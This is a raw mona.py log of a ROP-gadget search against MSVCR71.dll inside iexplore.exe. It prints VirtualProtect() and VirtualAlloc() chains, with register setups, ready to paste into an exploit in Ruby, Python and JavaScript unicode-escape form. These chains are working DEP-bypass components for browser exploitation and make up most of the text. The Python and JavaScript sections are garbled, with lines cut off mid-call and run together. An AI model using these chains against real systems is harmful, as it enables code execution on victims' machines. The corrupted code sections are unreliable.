---------- Mona command started on 2016-09-24 22:05:29 (v2.0, rev 427) ---------- 0BADF00D [+] Processing arguments and criteria 0BADF00D - Pointer access level : X 0BADF00D - Only querying modules msvcr71.dll 0BADF00D [+] Generating module info table, hang on... 0BADF00D - Processing modules 0BADF00D - Done. Let's rock 'n roll. 0BADF00D [+] Preparing output file '_rop_progress_iexplore.exe_732.log' 0BADF00D - (Re)setting logfile _rop_progress_iexplore.exe_732.log 0BADF00D [+] Progress will be written to _rop_progress_iexplore.exe_732.log 0BADF00D [+] Maximum offset : 40 0BADF00D [+] (Minimum/optional maximum) stackpivot distance : 8 0BADF00D [+] Max nr of instructions : 6 0BADF00D [+] Split output into module rop files ? False 0BADF00D [+] Enumerating 22 endings in 1 module(s)... 0BADF00D - Querying module MSVCR71.dll 0BADF00D - Search complete : 0BADF00D Ending : RETN 0x0C, Nr found : 2 0BADF00D Ending : RETN, Nr found : 2427 0BADF00D Ending : RETN 0x08, Nr found : 24 0BADF00D Ending : RETN 0x02, Nr found : 2 0BADF00D Ending : RETN 0x10, Nr found : 11 0BADF00D Ending : RETN 0x00, Nr found : 12 0BADF00D Ending : RETN 0x06, Nr found : 1 0BADF00D Ending : RETN 0x14, Nr found : 2 0BADF00D Ending : RETN 0x04, Nr found : 62 0BADF00D - Filtering and mutating 2543 gadgets 0BADF00D - Progress update : 500 / 2543 items processed (Sat 2016/09/24 10:05:32 PM) - (19%) 0BADF00D - Progress update : 1000 / 2543 items processed (Sat 2016/09/24 10:05:33 PM) - (39%) 0BADF00D - Progress update : 1500 / 2543 items processed (Sat 2016/09/24 10:05:35 PM) - (58%) 0BADF00D - Progress update : 2000 / 2543 items processed (Sat 2016/09/24 10:05:37 PM) - (78%) 0BADF00D - Progress update : 2500 / 2543 items processed (Sat 2016/09/24 10:05:39 PM) - (98%) 0BADF00D - Progress update : 2543 / 2543 items processed (Sat 2016/09/24 10:05:39 PM) - (100%) 0BADF00D [+] Creating suggestions list 0BADF00D [+] Processing suggestions 0BADF00D [+] Launching ROP generator 0BADF00D [+] Attempting to produce rop chain for VirtualProtect 0BADF00D Enumerating ROPFunc info 0BADF00D [+] Searching from 0x7c340000 to 0x7c396000 0BADF00D [+] Preparing output file 'MSVCR71_virtualprotect.xml' 0BADF00D - (Re)setting logfile MSVCR71_virtualprotect.xml 0BADF00D [+] Attempting to produce rop chain for VirtualAlloc 0BADF00D Enumerating ROPFunc info 0BADF00D [+] Searching from 0x7c340000 to 0x7c396000 0BADF00D [+] Preparing output file 'MSVCR71_virtualalloc.xml' 0BADF00D - (Re)setting logfile MSVCR71_virtualalloc.xml 0BADF00D [+] Preparing output file 'rop_chains.txt' 0BADF00D - (Re)setting logfile rop_chains.txt 0BADF00D [+] ROP chains written to file rop_chains.txt ################################################################################ Register setup for VirtualProtect() : -------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (ptr to W address) EDX = NewProtect (0x40) EBX = dwSize ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp) ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) --- alternative chain --- EAX = tr to &VirtualProtect() ECX = lpOldProtect (ptr to W address) EDX = NewProtect (0x40) EBX = dwSize ESP = lPAddress (automatic) EBP = POP (skip 4 bytes) ESI = ptr to JMP [EAX] EDI = ROP NOP (RETN) + place ptr to "jmp esp" on stack, below PUSHAD -------------------------------------------- ROP Chain for VirtualProtect() [(XP/2003 Server and up)] : ---------------------------------------------------------- *** [ Ruby ] *** def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x7c357cff, # POP EBP # RETN [MSVCR71.dll] 0x7c357cff, # skip 4 bytes [MSVCR71.dll] 0x7c36098d, # POP EBX # RETN [MSVCR71.dll] 0x00000201, # 0x00000201-> ebx 0x7c3458e6, # POP EDX # RETN [MSVCR71.dll] 0x00000040, # 0x00000040-> edx 0x7c354f23, # POP ECX # RETN [MSVCR71.dll] 0x7c38eb06, # &Writable location [MSVCR71.dll] 0x7c342eae, # POP EDI # RETN [MSVCR71.dll] 0x7c34d202, # RETN (ROP NOP) [MSVCR71.dll] 0x7c34aceb, # POP ESI # RETN [MSVCR71.dll] 0x7c3415a2, # JMP [EAX] [MSVCR71.dll] 0x7c345194, # POP EAX # RETN [MSVCR71.dll] 0x7c37a140, # ptr to &VirtualProtect() [IAT MSVCR71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] 0x7c345c30, # ptr to 'push esp # ret ' [MSVCR71.dll] ].flatten.pack("V*") return rop_gadgets end # Call the ROP chain generator inside the 'exploit' function : rop_chain = create_rop_chain() *** [ Python ] *** def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = "" rop_gadgets += struct.pack(' ebx rop_gadgets += struct.pack(' edx rop_gadgets += struct.pack(' ebx "%u58e6%u7c34" + // 0x7c3458e6 : ,# POP EDX # RETN [MSVCR71.dll] "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx "%u4f23%u7c35" + // 0x7c354f23 : ,# POP ECX # RETN [MSVCR71.dll] "%ueb06%u7c38" + // 0x7c38eb06 : ,# &Writable location [MSVCR71.dll] "%u2eae%u7c34" + // 0x7c342eae : ,# POP EDI # RETN [MSVCR71.dll] "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll] "%uaceb%u7c34" + // 0x7c34aceb : ,# POP ESI # RETN [MSVCR71.dll] "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll] "%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll] "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll] "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll] ""); // : -------------------------------------------------------------------------------------------------- ################################################################################ Register setup for VirtualAlloc() : -------------------------------------------- EAX = NOP (0x90909090) ECX = flProtect (0x40) EDX = flAllocationType (0x1000) EBX = dwSize ESP = lpAddress (automatic) EBP = ReturnTo (ptr to jmp esp) ESI = ptr to VirtualAlloc() EDI = ROP NOP (RETN) --- alternative chain --- EAX = ptr to &VirtualAlloc() ECX = flProtect (0x40) EDX = flAllocationType (0x1000) EBX = dwSize ESP = lpAddress (automatic) EBP = POP (skip 4 bytes) ESI = ptr to JMP [EAX] EDI = ROP NOP (RETN) + place ptr to "jmp esp" on stack, below PUSHAD -------------------------------------------- ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] : -------------------------------------------------------- *** [ Ruby ] *** def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x7c36f970, # POP EBP # RETN [MSVCR71.dll] 0x7c36f970, # skip 4 bytes [MSVCR71.dll] 0x7c34280f, # POP EBX # RETN [MSVCR71.dll] 0x00000001, # 0x00000001-> ebx 0x7c344f8e, # POP EDX # RETN [MSVCR71.dll] 0x00001000, # 0x00001000-> edx 0x7c354ea7, # POP ECX # RETN [MSVCR71.dll] 0x00000040, # 0x00000040-> ecx 0x7c342e9e, # POP EDI # RETN [MSVCR71.dll] 0x7c34d202, # RETN (ROP NOP) [MSVCR71.dll] 0x7c34aceb, # POP ESI # RETN [MSVCR71.dll] 0x7c3415a2, # JMP [EAX] [MSVCR71.dll] 0x7c344edc, # POP EAX # RETN [MSVCR71.dll] 0x7c37a094, # ptr to &VirtualAlloc() [IAT MSVCR71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] 0x7c345c30, # ptr to 'push esp # ret ' [MSVCR71.dll] ].flatten.pack("V*") return rop_gadgets end # Call the ROP chain generator inside the 'exploit' function : rop_chain = create_rop_chain() *** [ Python ] *** def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = "" rop_gadgets += struct.pack(' ebx rop_gadgets += struct.pack(' edx rop_gadgets += struct.pack(' ecx rop_gadgets += struct.pack(' ebx "%u4f8e%u7c34" + // 0x7c344f8e : ,# POP EDX # RETN [MSVCR71.dll] "%u1000%u0000" + // 0x00001000 : ,# 0x00001000-> edx "%u4ea7%u7c35" + // 0x7c354ea7 : ,# POP ECX # RETN [MSVCR71.dll] "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> ecx "%u2e9e%u7c34" + // 0x7c342e9e : ,# POP EDI # RETN [MSVCR71.dll] "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll] "%uaceb%u7c34" + // 0x7c34aceb : ,# POP ESI # RETN [MSVCR71.dll] "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll] "%u4edc%u7c34" + // 0x7c344edc : ,# POP EAX # RETN [MSVCR71.dll] "%ua094%u7c37" + // 0x7c37a094 : ,# ptr to &VirtualAlloc() [IAT MSVCR71.dll] "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll] ""); // : -------------------------------------------------------------------------------------------------- 0BADF00D ROP generator finished 0BADF00D 0BADF00D [+] Preparing output file 'stackpivot.txt' 0BADF00D - (Re)setting logfile stackpivot.txt 0BADF00D [+] Writing stackpivots to file stackpivot.txt 0BADF00D Wrote 768 pivots to file 0BADF00D [+] Preparing output file 'rop_suggestions.txt' 0BADF00D - (Re)setting logfile rop_suggestions.txt 0BADF00D [+] Writing suggestions to file rop_suggestions.txt 0BADF00D Wrote 530 suggestions to file 0BADF00D [+] Preparing output file 'rop.txt' 0BADF00D - (Re)setting logfile rop.txt 0BADF00D [+] Writing results to file rop.txt (2960 interesting gadgets) 0BADF00D Wrote 2960 interesting gadgets to file 0BADF00D [+] Writing other gadgets to file rop.txt (3146 gadgets) 0BADF00D Wrote 3146 other gadgets to file 0BADF00D Done 0BADF00D [+] This mona.py action took 0:00:17.425000 [22:06:05] Thread 000008FC terminated, exit code 0 Log file closed